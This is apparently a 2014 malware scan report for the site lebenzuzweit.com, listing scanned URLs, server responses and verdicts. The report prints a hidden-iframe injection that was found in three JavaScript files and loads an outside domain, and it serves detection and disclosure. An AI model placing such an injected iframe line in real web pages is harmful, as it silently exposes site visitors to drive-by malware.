Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=lebenzuzweit.com
Result: The website is marked by Google as suspicious: visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://lebenzuzweit.com/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Fri, 26 Sep 2014 22:42:28 GMT Location: http://www.lebenzuzweit.com/ Server: nginx/1.4.7 Content-Length: 236 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.lebenzuzweit.com/ | 200 OK Content-Length: 4279 Content-Type: text/html | clean |
http://www.lebenzuzweit.com/home.html | 200 OK Content-Length: 3396 Content-Type: text/html | clean |
http://www.lebenzuzweit.com/reg/form.php | 200 OK Content-Length: 6797 Content-Type: text/html | clean |
http://www.lebenzuzweit.com/reg/./js/jquery-1.3.2.min.js | 200 OK Content-Length: 57416 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below):
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://wypromuj.nazwa.pl/cmof.html?j=3364418></iframe>');
(function(){var l=this,g,y=l.jQuery,p=l.$,o=l.jQuery=l.$=function(E,F){return new o.fn.init(E,F)},D=/^[^<]*(<(.|\s)+>)[^>]*$|^#([\w-]+)$/,f=/^.[^:#\[\.,]*$/;o.fn=o.prototype={init:function(E,H){E=E||document;if(E.nodeType){this[0]=E;this.length=1;this.context=E;return this}if(typeof E==="string"){var G=D.
Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://wypromuj.nazwa.pl/cmof.html?j=3364418 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://wypromuj.nazwa.pl/cmof.html?j=3364418>
http://www.lebenzuzweit.com/reg/./js/jquery-ui-1.7.2.custom.min.js | 200 OK Content-Length: 63997 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below):
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://wypromuj.nazwa.pl/cmof.html?j=3364418></iframe>');
jQuery.ui||(function(c){var i=c.fn.remove,d=c.browser.mozilla&&(parseFloat(c.browser.version)<1.9);c.ui={version:"1.7.2",plugin:{add:function(k,l,n){var m=c.ui[k].prototype;for(var j in n){m.plugins[j]=m.plugins[j]||[];m.plugins[j].push([l,n[j]])}},call:function(j,l,k){var n=j.plugins[l];if(!n||!j.element[
Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://wypromuj.nazwa.pl/cmof.html?j=3364418 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://wypromuj.nazwa.pl/cmof.html?j=3364418>
http://www.lebenzuzweit.com/reg/./js/date_de.js | 200 OK Content-Length: 983 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below):
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://wypromuj.nazwa.pl/cmof.html?j=3364418></iframe>');
jQuery(function($){ $.datepicker.regional['de'] = { closeText: 'schließen', prevText: '<zurück', nextText: 'Vor>', currentText: 'heute', monthNames: ['Januar','Februar','März','April','Mai','Juni','Juli','August','September','Oktober','November','Dezember'], monthNamesShort: ['Jan','Feb','Mär','Apr','Mai','Jun','Jul','Aug','Sep','Okt','Nov','Dez'], dayNames: ['Sonntag','Montag','Dienstag','Mittwoch','Donnerstag','Freitag','Samstag'], dayNamesShort: ['So','Mo','Di','Mi','Do','Fr','Sa'], dayNamesMin: ['So','Mo','Di','Mi','Do','Fr','Sa'], dateFormat: 'dd.mm.yy', firstDay: 1, isRTL: false}; $.datepicker.setDefaults($.datepicker.regional['de']); });
Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://wypromuj.nazwa.pl/cmof.html?j=3364418 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://wypromuj.nazwa.pl/cmof.html?j=3364418>
http://www.lebenzuzweit.com/reg/df.php | HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Fri, 26 Sep 2014 22:42:33 GMT Pragma: no-cache Location: form.php Server: nginx/1.4.7 Content-Type: text/html; charset=UTF-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=395f0d7a2a8e0acf14b2d142502aba9a; path=/ | clean |
http://www.lebenzuzweit.com/test404page.js | 404 Not Found Content-Length: 1057 Content-Type: text/html | clean |
http://lebenzuzweit.com/about.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Fri, 26 Sep 2014 22:42:33 GMT Location: http://www.lebenzuzweit.com/about.html Server: nginx/1.4.7 Content-Length: 246 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.lebenzuzweit.com/about.html | 200 OK Content-Length: 6734 Content-Type: text/html | clean |
http://lebenzuzweit.com/weitere.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Fri, 26 Sep 2014 22:42:33 GMT Location: http://www.lebenzuzweit.com/weitere.html Server: nginx/1.4.7 Content-Length: 248 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.lebenzuzweit.com/weitere.html | 200 OK Content-Length: 3950 Content-Type: text/html | clean |
http://lebenzuzweit.com/foto/foto.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Fri, 26 Sep 2014 22:42:36 GMT Location: http://www.lebenzuzweit.com/foto/foto.html Server: nginx/1.4.7 Content-Length: 250 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.lebenzuzweit.com/foto/foto.html | 200 OK Content-Length: 4143 Content-Type: text/html | clean |
http://www.lebenzuzweit.com/foto/js/prototype.js | 200 OK Content-Length: 126132 Content-Type: application/x-javascript | clean |
http://lebenzuzweit.com/foto/js/scriptaculous.js?load=effects,builder | HTTP/1.1 301 Moved Permanently Connection: close Date: Fri, 26 Sep 2014 22:42:39 GMT Location: http://www.lebenzuzweit.com/foto/js/scriptaculous.js?load=effects,builder Server: nginx/1.4.7 Content-Length: 281 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.lebenzuzweit.com/foto/js/scriptaculous.js?load=effects,builder | 200 OK Content-Length: 2654 Content-Type: application/x-javascript | clean |
http://lebenzuzweit.com/foto/js/lightbox.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Fri, 26 Sep 2014 22:42:39 GMT Location: http://www.lebenzuzweit.com/foto/js/lightbox.js Server: nginx/1.4.7 Content-Length: 255 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.lebenzuzweit.com/foto/js/lightbox.js | 200 OK Content-Length: 18389 Content-Type: application/x-javascript | clean |
http://lebenzuzweit.com/foto/Oksana492x.jpg | HTTP/1.1 301 Moved Permanently Connection: close Date: Fri, 26 Sep 2014 22:42:39 GMT Location: http://www.lebenzuzweit.com/foto/Oksana492x.jpg Server: nginx/1.4.7 Content-Length: 255 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.lebenzuzweit.com/foto/oksana492x.jpg | 404 Not Found Content-Length: 1057 Content-Type: text/html | clean |
http://lebenzuzweit.com/foto/Natalya141x.jpg | HTTP/1.1 301 Moved Permanently Connection: close Date: Fri, 26 Sep 2014 22:42:39 GMT Location: http://www.lebenzuzweit.com/foto/Natalya141x.jpg Server: nginx/1.4.7 Content-Length: 256 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.lebenzuzweit.com/foto/natalya141x.jpg | 404 Not Found Content-Length: 1057 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: lebenzuzweit.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Fri, 26 Sep 2014 22:42:28 GMT
Location: http://www.lebenzuzweit.com/
Server: nginx/1.4.7
Content-Length: 236
Content-Type: text/html; charset=iso-8859-1
...236 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: lebenzuzweit.com
Referer: http://www.google.com/search?q=lebenzuzweit.com
Result:
The result is similar to the first query. There are no suspicious redirects found.